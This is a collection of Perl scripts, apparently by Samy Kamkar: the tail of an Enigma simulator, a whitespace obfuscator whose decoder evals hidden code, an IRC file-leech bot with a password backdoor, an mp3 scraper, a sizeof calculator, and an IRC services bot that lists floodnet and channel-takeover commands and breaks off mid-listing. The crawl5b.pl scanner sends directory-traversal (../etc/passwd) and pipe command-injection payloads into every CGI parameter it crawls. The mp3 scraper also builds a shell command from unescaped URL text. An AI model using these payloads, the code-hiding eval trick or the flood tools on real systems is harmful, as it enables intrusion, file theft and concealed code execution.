    if ($pos[1] > ints 'Z') {
     $pos[1] -= 26;
    }
    $pos[2]++;
    if ($pos[2] > ints 'Z') {
     $pos[2] -= 26;
    }
    $flag = 0;
   }
   if ($pos[0] eq $notch[$order[0] - 1]) {
    $pos[1]++;
    if ($pos[1] > ints 'Z') {
     $pos[1] -= 26;
    }
    if ($pos[1] eq $notch[$order[1] - 1]) {
     $flag = 1;
    }
   }
   for ($i = 0; $plug[$i]; $i += 2) {
    if ($ch eq $plug[$i]) {
     $ch = $plug[$i + 1];
    }
    elsif ($ch eq $plug[$i + 1]) {
     $ch = $plug[$i];
    }
   }
   for ($i = 0; $i < 3; $i++) {
    $ch += $pos[$i] - ints 'A';
    if ($ch > ints 'Z') {
     $ch -= 26;
    }
    $ch -= $rings[$i] - ints 'A';
    if ($ch < ints 'A') {
     $ch += 26;
    }
    $ch = $rotor[$order[$i] - 1][$ch - ints 'A'];
    $ch += $rings[$i] - ints 'A';
    if ($ch > ints 'Z') {
     $ch -= 26;
    }
    $ch -= $pos[$i] - ints 'A';
    if ($ch < ints 'A') {
     $ch += 26;
    }
   }
   $ch = $reg[$ch - ints 'A'];
   for ($i = 3; $i; $i--) {
    $ch += $pos[$i - 1] - ints 'A';
    if ($ch > ints 'Z') {
     $ch -= 26;
    }
    $ch -= $rings[$i - 1] - ints 'A';
    if ($ch < ints 'A') {
     $ch += 26;
    }
    for ($j = 0; $j < 26; $j++) {
     if ($rotor[$order[$i - 1] - 1][$j] eq $ch) {
      last;
     }
    }
    $ch = $j + ints 'A';
    $ch += $rings[$i - 1] - ints 'A';
    if ($ch > ints 'Z') {
     $ch -= 26;
    }
    $ch -= $pos[$i - 1] - ints 'A';
    if ($ch < ints 'A') {
     $ch += 26;
    }
   }
   for ($i = 0; $plug[$i]; $i += 2) {
    if ($ch eq $plug[$i]) {
     $ch = $plug[$i + 1];
    }
    elsif ($ch eq $plug[$i + 1]) {
     $ch = $plug[$i];
    }
   }
   $n++;
   print pack("C*", $ch);
   if ($n % 5 == 0) {
    if ($n % 55 == 0) {
     print "\n";
    }
    else {
     print " ";
    }
   }
  }
 }
}


-Samy Kamkar


Encodes perl code (from file: code) and outputs 'nothing':

	perl -ne 'for(split//){print"\t"x(ord()/50)." "x(ord()%50)."\n"}' code > new

re-golfed 10/26/04:
	perl -nle'print"\t"x(ord()/50).$"x(ord()%50)for/(.)/g' code > new


Decodes 'nothing' (from file: new) and evaluates it:
	perl -e 'open_;$f.=chr s/ //g+s/\t//g*50while<>;eval$f' new


Example:

bash# cat code
print "yo\n";
bash# perl -ne 'for(split//){print"\t"x(ord()/50)." "x(ord()%50)."\n"}' code > new
bash# cat new


bash# perl -e 'open_;$f.=chr s/ //g+s/\t//g*50while<>;eval$f' new
yo
bash#


#!/usr/bin/perl

use Socket;
die "usage: $0 <irc server[:port]> <nick> <channel> <'movie'>\n" unless @ARGV == 4;

use strict;
my $timeout	= 30; # 30
my $maxbytes	= 1; # 4096
my $nickserv	= 1;
my $debug	= 1;
my $server	= shift;
my $botnick	= shift;
my $channel	= "#" . shift;
my $movie	= shift;
my $password	= "hax0rm3";
my $nickservp	= "h4wh4wh4w";
my $port	= 6667;
my %nicks	= ();
my $fork;
$port = $1 if $server =~ s/:(.*)$//;
($fork = fork()) && die "$0: bot active on process $fork\n" unless $debug;

while (1) {
  socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
  connect(SOCK, sockaddr_in($port, inet_aton($server))) || die "Unable to connect\n";
  select(SOCK);
  $| = 1;
  select(STDOUT);

  print SOCK "USER $botnick $botnick $botnick :h4w h4w h4w\n";
  print SOCK "NICK $botnick\n";
  sleep 2;
  print SOCK "NICKSERV IDENTIFY $nickservp\n" if $nickserv;

  while (<SOCK>) {
    print if /^ERROR\s+/;

    if (/^PING(.*)$/) {
      print SOCK "PONG$1\n";
      next;
    }

    my ($rnick, $rwhat, $rwhere, $rdata) = $_ =~ /^:(\S+)\s+(\S+)\s+(\S+)\s+:?(.*)$/;
    $rnick =~ s/\!([^@]+)\@(.*)$//;
    my ($rident, $rhost) = ($1, $2);
    $rdata =~ s/\x03\d\d?//g; # strip all colors out
    $rdata =~ s/[^\x20-\x7e]//g; # strip all lame characters out
    if ($rwhat eq "002") {
      print SOCK "JOIN $channel\n";
    }

    elsif ($rwhat eq "366") {
      print "$channel: joined - searching for `$movie`\n" if $debug;
      print SOCK "PRIVMSG $channel :\@find $movie\n";
    }

    elsif ($rwhat eq "PRIVMSG") {
      if ($rdata =~ /^\caPING\s+(.*)$/) {
        print SOCK "NOTICE $rnick :\caPING $1\n";
      }

      elsif ($rwhere !~ /^#/) { # private messages
        if ($rdata =~ /^pass $password (.*)$/i) {
          print SOCK "$1\n";
        }
        elsif ($rdata =~ /^die $password/i) {
          close(SOCK);
          exit;
        }
        elsif ($rdata =~ /Trigger:\s*\/ctcp\s+(\S+)\s+(.*?)\] /) {
          $nicks{$1}[0] = $2;
          print "$rnick: recieved trigger\n" if $debug == 2;
        }
        elsif ($rdata =~ /Filename:\s*(.*?)\] (?:\s*\[Directory:\s*(.*?)\] )?/) {
          $nicks{$rnick}[2] = $1;
          $nicks{$rnick}[1] = $2;
          $nicks{$rnick}[1] =~ s/^Drive\s*\d*[\\\/]//i;
          $nicks{$rnick}[1] =~ s/^Root Dir[\\\/]//i;
          print SOCK "PRIVMSG $rnick :\cA$nicks{$rnick}[0]\cA\n";
          print "$rnick: sending DCC chat request\n" if $debug == 2;
          sleep 2; # to avoid server flood protection
        }
        elsif ($rdata =~ /^DCC\s+CHAT\s+chat\s+(\S+)\s+(\S+)/i) {
          fork() || &dccchat($1, $2, $nicks{$rnick}[1], $nicks{$rnick}[2], $rnick);
        }
        elsif ($rdata =~ /^DCC\s+SEND\s+(.*)\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
          $nicks{$rnick}[3] = $2;
          $nicks{$rnick}[4] = $4;
          $nicks{$rnick}[5] = $1;
          &dcccheck(\*SOCK, $1, $2, $3, $4, $rnick)
        }
        elsif ($rdata =~ /^DCC\s+ACCEPT\s+(.*)\s+(\S+)\s+(\S+)\s*$/i) {
          fork() || &dccsend($nicks{$rnick}[5], $nicks{$rnick}[3], $2, $nicks{$rnick}[4], $rnick, $3);
        }
      }
    }
  }
}

sub dccchat {
  my ($ip, $port, $dir, $movie, $nick) = @_;
  socket(DCCSOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
  connect(DCCSOCK, sockaddr_in($port, pack("N", $ip))) || die "Unable to connect\n";
  select(DCCSOCK);
  $| = 1;
  select(STDOUT);
  print "$nick: DCC chat accepted\n" if $debug;
  sleep 2;
  print DCCSOCK "cd $dir\n" if $dir;
  print DCCSOCK "get $movie\n";
  while (<DCCSOCK>) {
    if (/Sorry/) {
      sleep 20;
      print DCCSOCK "get $movie\n";
    }
    elsif (/Now sending|Inserting you in/) {
      last;
    }
    elsif (/Invalid file/) {
      print "$nick: `$movie` not found - disconnecting\n" if $debug;
      exit;
    }
  }
  exit;
}

sub dcccheck {
  my ($sock, $movie, $ip, $port, $size, $nick) = @_;

  my $omovie = $movie;
  my $num = 0;
  if (-e $movie && -e "$movie.lock") {
    do { $num++ } while (-e "$movie.$num" && -e "$movie.lock");
  }
  $movie .= ".$num" if $num;

  open(MLOCK, ">$movie.lock");
  close(MLOCK);
  my $trans = (stat($movie))[7];

  if ($trans >= $size) {
    print "$nick: exiting - `$movie`s size is already $trans - downloadable file is $size\n";
    unlink("$movie.lock");
    return ();
  }
  elsif ($trans) {
    print "$nick: resuming `$movie` from $trans ($size bytes total)\n";
    print $sock "PRIVMSG $nick :\cADCC RESUME $omovie $port $trans\cA\n";
    unlink("$movie.lock");
    return ($trans);
  }
  else {
    print "$nick: downloading `$movie` ($size bytes)\n" if $debug;
    fork || &dccsend($movie, $ip, $port, $size, $nick, $trans);
  }
  return ();
}

sub dccsend {
  my ($movie, $ip, $port, $size, $nick, $trans) = @_;
  socket(DCCSOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
  connect(DCCSOCK, sockaddr_in($port, pack("N", $ip))) || die "Unable to connect\n";
  my $old = select(DCCSOCK);
  $| = 1;
  select($old);
  if ($trans) {
    open(MLOCK, ">$movie.lock");
    close(MLOCK);
  }

  open(MOVIE, ">>$movie") || die "Can't open $movie for writing: $!\n";

  my ($data, $bytes);
  while (($bytes, $data) = &getdata(\*DCCSOCK, $maxbytes)) {
sleep 1;
    if ($bytes) {
      $trans += $bytes;
      print MOVIE $data;
      last unless &senddata(\*DCCSOCK, pack("N", $trans));
    }
    else {
      print "$nick: disconnected from filesend - $trans/$size bytes recieved\n" if $debug;
      open(TEXT, ">>movies.txt");
      print TEXT "$movie :: $trans/$size\n";
      close(TEXT);
      close(MOVIE);
      unlink("$movie.lock");
      exit;
    }

    last if $trans == $size;
  }

  close(MOVIE);
  unlink("$movie.lock");

  open(TEXT, ">>movies.txt");
  print TEXT "$movie :: $trans/$size\n";
  close(TEXT);

  if ($trans != $size) {
    print "$nick: disconnected from filesend - $trans/$size bytes recieved\n" if $debug;
  }
  else {
    print "$nick: recieved `$movie` - $trans/$size bytes recieved\n" if $debug;
  }
  exit;
}

sub getdata {
  my ($sock, $bytes) = @_;
  my ($tbytes, $data);
  eval {
    local $SIG{"ALRM"} = sub { die };
    alarm $timeout;
    $tbytes = sysread($sock, $data, $bytes);
    alarm 0;
  };

  if ($@) {
    return ();
  }

  return ($tbytes, $data);
}

sub senddata {
  my ($sock, $data) = @_;
  my ($bytes);
  eval {
    local $SIG{"ALRM"} = sub { die };
    alarm $timeout;
    $bytes = syswrite($sock, $data);
    alarm 0;
  };

  if ($@) {
    return ();
  }

  return ($bytes);
}


#!/usr/bin/perl

# recursively suck mp3s from apache-type directory structures
# v0.21 - [3/4/02]
#
# this will only go deeper into directory structures but will
# never go higher than where it's at, for example:
# > mp3get blah.com/x/
#  mp3get will suck all .mp3's in /x/ and recursively go into
#  all dirs in blah.com/x/ looking for more mp3s, locally
#  creating the dirs with mp3s in them but it will NEVER go
#  down to ../ (blah.com/) even if there are direct links to
#  it or just a link to "/" so you never end up wasting time
#  like wget makes you :)
#
# also it doesn't waste time getting images or anything, only
# dirs and mp3s (and .ogg's)
#
# -samy [cp5@LucidX.com]

my @requests = (    # when you get mp3s/dirs, the user agent
                    # will be randomly chosen from this array
 "User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)",
 "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)",
);


die "usage: $0 [-d (debugging)] <url1> [url2] [url3]..\n" if @ARGV == 0;

my $debug;
if ($ARGV[0] eq "-d") {
 shift(@ARGV);
 $debug = 1;
 print STDERR "<Debugging Mode Enabled>\n\n";
}
my $urls = @ARGV;
my $cur;
my $os;
if ($^O =~ /Win32/i) {
 $os = "> NUL 2> NUL";
}
else {
 $os = "> /dev/null 2> /dev/null";
}
$os = " " if $debug;

$SIG{INT} = sub {
 unlink($cur) if $cur;
 close(CUR);
 die "\nExiting...\n";
};

use IO::Socket;

my @urls;
for (my $i = 0; $i < $urls; $i++) {
 ($urls[$i][0], $urls[$i][1], $urls[$i][2]) = $ARGV[$i] =~ /^(?:http:\/\/)?([^\/:]+)(?::(\d+))?(\/.*)?$/i;
 $urls[$i][1] = 80 if !$urls[$i][1];
 $urls[$i][2] .= "/" if (!$urls[$i][2] || $urls[$i][2] !~ /\/$/);
 ($urls[$i][3]) = $urls[$i][2] =~ /\/([^\/]*)\/?$/;
}

for ($i = 0; $i < $urls; $i++) {
 &recur(@{$urls[$i]});
}

sub recur {
 my @addr = @_;
 my $sock = IO::Socket::INET->new(
  PeerAddr => $addr[0],
  PeerPort => $addr[1],
  Timeout  => 5,
  Proto    => "tcp",
 ) or print STDERR "Can't connect to http://$addr[0]:$addr[1]...moving on\n";
 if ($sock) {
  $addr[2] =~ s/&amp;/&/g;
  print $sock "GET $addr[2] HTTP/1.0\nHost: $addr[0]\nAccept: */*\n"
   . $requests[int(rand(@requests))] . "\n\n";
  my $httpResponse = join('', <$sock>);
  close($sock);
  my (@mp3s, @dirs);
  print "Scanning http://$addr[0]:$addr[1]$addr[2]\n";
  while ($httpResponse =~ s/<a\s+href\s*=\s*(?:"([^"]*)"|'([^']*)'|`([^`]*)`|(\S*))//is) {
   my $tmp = $1;
   if ($tmp =~ /\.ogg|\.mp3|\.m3u$/i) {
    push(@mp3s, $tmp);
   }
   elsif ($tmp =~ /\/$/ && $tmp !~ /^http:\/\/|^\.|^\/|\?/i) {
    push(@dirs, $tmp);
   }
  }
  if (@mp3s) {
   my $temp = $addr[3];
   $addr[3] =~ s/%(.{2})/pack("H2", $1)/eg;
   $addr[3] =~ s/[\?\*:<>|"\\]//g;
   $addr[3] =~ s/\/?$/\//;
   &mkd($addr[3]) unless $addr[3] eq "1";
   $addr[3] =~ s/&amp;/&/g;
   foreach (@mp3s) {
    s/&amp;/&/g;
    s/"/\\"/g;
    my $mp3 = $_;
    $mp3 =~ s/%(.{2})/pack("H2", $1)/eg;
    $mp3 =~ s/[\?\*:<>|"\/\\]//g;
    next if -e $addr[3] . $mp3;
    unlink($addr[3] . $_) if -e $addr[3] . $_;
    print " Getting $addr[3]$mp3\n";
    if ($^O !~ /Win32/i) {
     print "  http://$addr[0]:$addr[1]$addr[2]$_\n";
    }
    $cur = $addr[3] . $_;
    open(CUR, "wget \"--directory-prefix=$addr[3]\" \"http://$addr[0]:$addr[1]$addr[2]$_\" --user-agent=\""
     . $requests[int(rand(@requests))] . "\" --execute=robots=off $os |");
    while (<CUR>) { }
    $cur = "";
    rename($addr[3] . $_, $addr[3] . $mp3);
   }
  }
  foreach (@dirs) {
   my @tmp = @addr;
   $tmp[2] =~ s/\/?$/\/$_/;
   $tmp[3] =~ s/\/?$/\/$_/;
   &recur(@tmp);
  }
 }
}

sub mkd {
 my $dr = $_[0];
 if (!-e $dr && $dr ne "") {
  my $t = $dr =~ s/[^\/]*\/$//;
  &mkd($t);
  mkdir($dr, "755");
  print "MKDIR $dr\n" if $debug;
 }
}


#!/usr/bin/perl

#######################################################
#
# crawl5b.pl - by Samy Kamkar [CommPort5@LucidX.com]
# This version includes a status line when not in
# verbose mode and a few others small things
#
# Updated September 14th
#
# crawl5b.pl
# crawls a machine (over http) for all links and forms
# and attempts to find CGIs on the machine with bugs
# (exploitable to reading any file on the system)
#
# my algorithm can be found at:
# http://cp5.LucidX.com/5balgo1.html
# and other algorithms along with similar programs can
# be found at http://cp5.LucidX.com
#
# developed specifically for challenge 5B of Caezar's Challenge
# check out http://www.caezarschallenge.org (Caezar++)
#

$statusbar = 1;
           # a status-bar to show how many pages, CGIs, and bugs were found

$dats = 1;
           # 1 to exclude the second algorithm (doesn't check for foo|perl -e...)
           # speeds up scan twice as fast and checks for only the more common bug
           # set to 2 to include the second aglorithm ($dat2)

$dat1 = "../" x 20 . "etc/passwd"; # ../../../../etc/passwd
$dat2 = 'foo|perl -e \'print"roo";print"t:"\'&&foo'; # may want to add a foo; at the beginning

$first = "img|a|body|area|frame|meta";  # tags right after a '<'
$second = "src|href|background|target"; # options in any of the tags in $first
@ignore = ( # file extensions that will not be an HTML or CGI
 "gif", "jpg", "jpeg", "bmp", "psp", "mov", "txt", "ram", "wmv", "pdf",
 "doc", "xls", "rm", "gz", "tar", "zip", "png", "mpg", "mpeg", "mp3",
);

#
#######################################################

$SIG{INT} = sub { die "\n" };

use IO::Socket;

unless (@ARGV == 1 || @ARGV == 2) {
 die "usage: $0 <http://host[/start/page]> [-v (for verbose)]\n";
}

sub colored { return $_[0] }
eval("use Term::ANSIColor");

$bugsa = 0;
$cgisa = 0;
$pagesa = 0;

while ($dat1 =~ s/(.)//) {
 $tmp = $1;
 if ($tmp =~ /[\W[^\.\/]]/) {
  $data1 .= "%" . unpack("H*", $tmp);
 }
 else {
  $data1 .= $tmp;
 }
}
while ($dat2 =~ s/(.)//) {
 $tmp = $1;
 if ($tmp =~ /\W/) {
  $data2 .= "%" . unpack("H*", $tmp);
 }
 else {
  $data2 .= $tmp;
 }
}
$data1 .= "%00";
$data2 .= "%00";
($host, $tmp) = $ARGV[0] =~ /^(?:http:\/\/)?([^\/]+)(\/?.*)$/;
$ip = &host2ip($host);
$ign = join('|', @ignore);

print "Beginning to scan " . colored($host, "bold") . " :: " . colored($ip, "bold") . " for CGI bugs...\n";
print "Kick back and relax, this will take a while...\n\n";
if ($ARGV[1] eq '-v') {
 $verbose = 1;
 $statusbar = 0;
}
&status if $statusbar;
if ($tmp) {
 $tmp =~ s/\/$//;
 if ($tmp !~ /^\//) {
  $urls{"/$tmp"} = 1;
 }
 else {
  $urls{$tmp} = 1;
 }
}
else {
 $urls{"/"} = 1;
}
&recursive(%urls);

sub recursive {
 %urls = @_;
 foreach $url (keys(%urls)) {
  if ($url =~ /\/$/) {
   $curdir = $url;
  }
  else {
   $url =~ /^(.*\/)[^\/]+$/;
   $curdir = $1;
  }
  $read{$url} = $urls{$url};
  delete $urls{$url};
  $sock = IO::Socket::INET->new(
	PeerAddr => $ip,
	PeerPort => 80,
	Timeout  => 10,
	Proto    => "tcp"
  ) or die "Can't connect to $ip:80\n";
  $url =~ s/&$//;
  $pagesa++;
  if ($verbose) {
   print "GETing $url\n";
  }
  &status if $statusbar;
  print $sock "GET $url HTTP/1.0\nHost: $host\n\n";
  $response = join('', <$sock>);
  $response =~ s/\n/ /g;
  $response = ">$response";
  @res = split(/>[^<]*</, $response);
  foreach $response (@res) {
   $tmp = "";

   # check for form beginnings
   if ($response =~ /^form.*action\s*=\s*"?'?([^"'\s]+)/i) {
    $form[0] = $1 . "?";
    $form[0] =~ s/^http:\/\/([^\/]+)//i;
    if ($form[0] !~ /^\//) {
     $form[0] = $curdir . $form[0];
    }
   }

   # check for a select
   elsif ($form[0] && $response =~ /select\s+name\s*=\s*"?'?([^"'\s]+)/i) {
    $form[0] .= "$1=";
    $form[2]++;
   }

   # check for normal form inputs
   elsif (
    $form[0] &&
    $response =~
    /(?:type\s*=\s*"?'?([^"'\s]*)"?'?)?.*\s+name\s*=\s*"?'?([^"'\s]+)'?"?\s*(?:value\s*=\s*"?'?([^"'\s]*))?/i
   ) {
    ($type, $name, $value) = ($1, $2, $3);
    $form[0] .= $name . "=" . $value . "&";
   }

   # check for option values for forms
   elsif ($form[0] && $form[2] && $response =~ /option\s+value\s*=\s*"?'?([^"'\s]+)/i) {
    $form[0] .= $1 . "&";
    $form[2] = 0;
   }

   # check for end of forms
   elsif ($form[0] && $response =~ /\/form/i) {
    $form[1]++;
   }

   # check for unwanted tags
   unless ($response =~ /^(?:$first).*(?:$second)\s*=\s*"?'?([^"'\s]+)/i) {
    unless ($form[1]) {
     next;
    }
    else {
     $tmp = $form[0];
     $tmp =~ s/&$//;
     @form = ();
    }
   }

   unless ($tmp) {
    $tmp = $1;
   }
   if ($tmp =~ s/^http:\/\/([^\/]+)//i) {
    $addr = $1;
   }
   else {
    $addr = "";
   }
   if ($tmp !~ /^\//) {
    $tmp = $curdir . $tmp;
   }
   if (
    (
     $addr && !$tmp
    ) ||
    $urls{$tmp} ||
    $read{$tmp} ||
    $tmp =~ /mailto:|#|https:|ftp:|news:/i ||
    (
     $tmp !~ /\?/ &&
     $tmp =~ /(?:$ign)/i
    )
   ) {
    next;
   }
   if ($tmp =~ /\?/) {
#    $read{$tmp} = 1;
    $urls{$tmp} = 1;
    &check($tmp);
   }
   else {
    $urls{$tmp} = 1;
   }
  }
 }
 if (%urls) {
  &recursive(%urls);
 }
}

sub host2ip {
 return join(".", unpack("C4", (gethostbyname($_[0]))[4]));
}

sub check {
 ($cgi) = @_;
 $cgi =~ s/&$//;
 $cgisa++;
 if ($verbose) {
  print "Attempting to break $cgi\n";
 }
 &status if $statusbar;
 $cgi =~ s/([\+\%\$\@\*\\\|\^\(\[\{\)\]\}])/\\$1/g;
 $origcgi = $cgi;
 $cgi =~ s/^(.*\?)//;
 $cgib = $1;
 if ($cgi !~ /=/) {
  for (1 .. $dats) {
   $origcgi =~ s/\?.*$/?/;
   $origcgi .= ${data . $_};
   $sock = IO::Socket::INET->new(
	PeerAddr => $ip,
	PeerPort => 80,
	Timeout  => 10,
	Proto    => "tcp"
   );
   print $sock "GET $origcgi HTTP/1.0\nHost: $host\n\n";
   $response = join('', <$sock>);
   $response =~ s/\n//g;
   if ($response =~ /root(?:\:|"|')/ && !$bug{$origcgi}) {
    $bug{$origcgi} = 1;
    if ($statusbar) {
     print "\r";
    }
    $bugsa++;
    print "BUG FOUND - http://$host$origcgi\n";
   }
  }
 }
 else {
  for (1 .. $dats) {
   %info = split(/=|&/, $cgi);
   foreach $key (keys(%info)) {
    $origcgi = $cgib . $cgi;
    $tmp = ${data . $_};
    $origcgi =~ s/((?:\?|&)$key=)$info{$key}/$1$tmp/;
    $sock = IO::Socket::INET->new(
	PeerAddr => $ip,
	PeerPort => 80,
	Timeout  => 10,
	Proto    => "tcp"
    );
    print $sock "GET $origcgi HTTP/1.0\nHost: $host\n\n";
    $response = join('', <$sock>);
    $response =~ s/\n//g;
    if ($response =~ /root(?:\:|"|')/ && !$bug{$origcgi}) {
     $bug{$origcgi} = 1;
     if ($statusbar) {
      print "\r";
     }
     $bugsa++;
     print "BUG FOUND - http://$host$origcgi\n";
    }
   }
  }
 }
}

sub status {
 print STDERR "\r" . " " x (6 - length($pagesa));
 print STDERR colored($pagesa, "bold");
 print STDERR " - pages accessed / " . " " x (5 - length($cgisa));
 print STDERR colored($cgisa, "bold");
 print STDERR " - attempted CGIs to break / " . " " x (5 - length($bugsa));
 print STDERR colored($bugsa, "bold");
 print STDERR " - CGI bugs found";
}

END {
 print "\n";
}


#!/usr/bin/perl

use Config;

die "usage: $0 <header file>\n" unless @ARGV == 1;

%chars = (
	'char' => (1 * 1),
	'double' => ($Config{doublesize} * 1),
	'int' => ($Config{intsize} * 1),
	'long' => ($Config{longsize} * 1),
	'short' => ($Config{shortsize} * 1),
	'long double' => ($Config{longdblsize} * 1),
	'long long' => ($Config{longlongsize} * 1),
	'ptr' => ($Config{ptrsize} * 1),
	'__uint8_t' => (1 * 1),
	'__uint16_t' => (2 * 1),
	'__uint32_t' => (4 * 1),
	'__uint64_t' => (8 * 1),
	'int8_t' => (1 * 1),
	'int16_t' => (2 * 1),
	'int32_t' => (4 * 1),
	'int64_t' => (8 * 1),
	'pid_t' => (4 * 1),
	'caddr_t' => (4 * 1),
	'sa_family_t' => (1 * 1),
	'void' => (1 * 1),
);

%chars = (
	%chars,
	'unsigned int' => $chars{int},
	'unsigned char' => $chars{char},
	'unsigned long' => $chars{long},
	'unsigned short' => $chars{short},
);

open(TMP, "</usr/include/sys/types.h");
while (<TMP>) {
 if (/typedef\s+(.+)\s+(\S+);/) {
  ($ele, $key) = ($1, $2);
  if ($ele =~ /struct/) {
   $ele =~ s/\s+/ /g;
   $chars{$key} = \$sizeof{$ele} unless $chars{$key};
  }
  else {
   $chars{$key} = $chars{$ele} unless $chars{$key};
  }
 }
}
close(TMP);

open(FH, "<$ARGV[0]") or die "Can't open file $file: $!\n";
@tmp = <FH>;
$file = join('', @tmp);
foreach (@tmp) {
 if (/typedef\s+(.+)\s+(\S+);/) {
  ($ele, $key) = ($1, $2);
  if ($ele =~ /struct/) {
   $ele =~ s/\s+/ /g;
   $chars{$key} = \$sizeof{$ele} unless $chars{$key};
  }
  else {
   $chars{$key} = $chars{$ele} unless $chars{$key};
  }
 }
 elsif (/include\s+(\S+)/) {
  if ($1 =~ /^<(.*?)>/) {
   open(TMP, "</usr/include/$1");
   while (<TMP>) {
    push(@tmp, $_);
   }
   close(TMP);
  }
  elsif ($1 =~ /^(?:"|')(.*?)(?:"|')/) {
   open(TMP, "</usr/include/$1");
   while (<TMP>) {
    push(@tmp, $_);
   }
   close(TMP);
  }
 }
}

while ($file =~ s/(struct\s+(\S+)\s*{[^}]+})//) {
 my %tmph;
 ($tmp, $struct) = ($1, $2);
 $tmp =~ s/\/\*.*?\*\///g;
 while ($tmp =~ s/\n\s*(.+\S+)\s+(\S+);//) {
  my $tmpr;
  ($str, $val) = ($2, $1);
  if ($val =~ /struct/) {
   $val =~ s/\s+/ /g;
   $val =~ s/^(.*?)$/\$sizeof\{'$1'\}/;
  }
  $str =~ s/\[(\d+)\]//;
  $tmpr = $1;
  $str =~ s/\s+.*?$//g;
  $str =~ s/\W+//g;
  unless ($tmpr =~ /^\d+$/) {
   $tmpr = 1;
  }
  $structs{$struct}{$str} = $val . "[$tmpr]";
 }
}

foreach $struct (keys(%structs)) {
 my $size;
 foreach $val (keys(%{$structs{$struct}})) {
  $tmp = $structs{$struct}{$val};
  ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]/;
  $size = ($size + ($chars{$vl} * $ts));
 }
 $sizeof{"struct $struct"} = $size;
}

foreach $struct (keys(%structs)) {
 my $size;
 foreach $val (keys(%{$structs{$struct}})) {
  if ($structs{$struct}{$val} =~ /struct/) {
   $tmp = $structs{$struct}{$val};
   $tmp =~ s/\$sizeof{'(.*?)'}/$1/g;
   ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
   $size = ($size + ($sizeof{$vl} * $ts));
  }
  else {
   $tmp = $structs{$struct}{$val};
   ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
   $size = ($size + ($chars{$vl} * $ts));
  }
 }
}

foreach $struct (reverse(keys(%structs))) {
 my $size;
 foreach $val (keys(%{$structs{$struct}})) {
  if ($structs{$struct}{$val} =~ /struct/) {
   $tmp = $structs{$struct}{$val};
   $tmp =~ s/\$sizeof{'(.*?)'}/$1/g;
   ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
   $size = ($size + ($sizeof{$vl} * $ts));
  }
  else {
   $tmp = $structs{$struct}{$val};
   ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
   $size = ($size + ($chars{$vl} * $ts));
  }
 }
 print "\$sizeof{'struct $struct'} = $size;\n";
}


#!/usr/bin/perl

#############################################################
# hybbot 0.8
# by samy (who else?) CommPort5@LucidX.com
#
# hybbot is freely available and covered by the same terms
# and conditions of Perl itself through the Artistic License
#############################################################


# Commands and stuff:
#
#   all users/channel ops/channel owners:
#     status
#     pass <newpass>
#     chpass <oldpass> <newpass> (not yet)
#     mode <pass> <#chan> <modes>
#     register <#chan> <pass>
#     op <#chan> <pass> [nick]
#     addop <#chan> <pass> <nick>
#     delop <#chan> <pass> <nick> (not yet)
#     invite <#chan> <pass> [nick]
#     addchan <#chan> <pass> [modes] (not yet)
#     delchan <#chan> (not yet)
#     chmodes <#chan> <pass> <modes> (not yet)
#     addaop <#chan> <pass> <nick!ident@host>
#
#   wanna-bes:
#     <pass> opz0r <#chan> <nick>
#
#   opers:
#     <pass> rehash
#     <pass> opz0r <#chan> <nicks>
#     <pass> deopz0r <#chan> <nicks>
#     <pass> joinz0r <#chans>
#     <pass> partz0r <#chans>
#
#   hax0rs:
#     <pass> addjoin <#chan> [modes]
#     <pass> botjoin <botnick> <#chan>
#     <pass> botpart <botnick> <#chan>
#     <pass> botop <botnick> <#chan> <nick>
#     <pass> botdeop <botnick> <#chan> <nick>
#     <pass> addbot <botnick> <flags> <hostname> <ircname>
#     <pass> killbot <botnick> [message]
#     <pass> listbots
#     <pass> massopz0r <#chans> <nick>
#     <pass> massdopz0r <#chans> <nick>
#     <pass> adduser <nick> <id> <pass>
#     <pass> raw <raw irc commands>
#     <pass> m0pz0r <#chan>
#
#   l33t hax0rs:
#     <pass> exit <quit message>
#     <pass> floodnet <# of bots> <name of net> [nick]
#     <pass> fnet <name of net> <raw commands>
#     <pass> killnet <name of net> [quit message]
#     <pass> restart [exit message]
#     <pass> takeover <#chan> <nicks>
#     <pass> addoper <nick> <id>
#     <pass> retrieve <raw irc command>
#     <pass> get <variable name>
#
# Info on users and channels:
#    $nix{$a}{$b}
#      $a = nick of anyone on network
#      $b = chans that nick is in
#    $all{$a}{$b}
#      $a = chans with people in them
#      $b = nicks of people in chan
#    $sall{$a}{$b}
#      $a = chans with people in them
#      $b = nicks of people in chan but the nick
#           may include a '@' or '+' in front of it


$conf = "hybbot.conf";
$joinz0r = 1;

$SIG{'HUP'} = \&rehash;
$version = "0.8";
use Socket;
unless (@ARGV == 5) {
 die "usage: $0 <nick[,nick2,nick3,etc]> <hub server [to connect to]> <hybbot server> <server password> <hostname[,hostname2,hostname3,etc]>\n";
}
defined ($fork = fork()) || print STDERR "Unable to fork...\n";
($fork) && die "hybbot actived on PID $fork\n";
&rehash;
$remote = $ARGV[1];
$port = 6667;
@nickss = split(/,/, $ARGV[0]);
@hosts = split(/,/, $ARGV[4]);
$host = shift(@hosts);
$botnick = shift(@nickss);
$iaddr = inet_aton($remote);
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Cannot create socket\n";
connect(SOCK, $paddr) || die "Unable to connect\n";
select(SOCK);
$| = 1;
select('stdout');
$srvc = $ARGV[2];
print SOCK "PASS $ARGV[3] :TS\n";
print SOCK "SERVER $ARGV[2] 1 :Services - hybbot [irc.LucidX.com]\n";
$tmp = "NICK $botnick 1 1 +noKNbcdfikrswxyzO $botnick $host $ARGV[2] :hybbot by CommPort5[\@LucidX.com] - samy (Service bot)";
print SOCK "$tmp\n";
$bots{$botnick} = $tmp;
for ($i = 0; $i < @nickss; $i++) {
 $tmp = "NICK $nickss[$i] 1 1 +iw $nickss[$i] $hosts[$i] $ARGV[2] :hybbot by CommPort5[\@LucidX.com] - samy (Service bot)";
 print SOCK "$tmp\n";
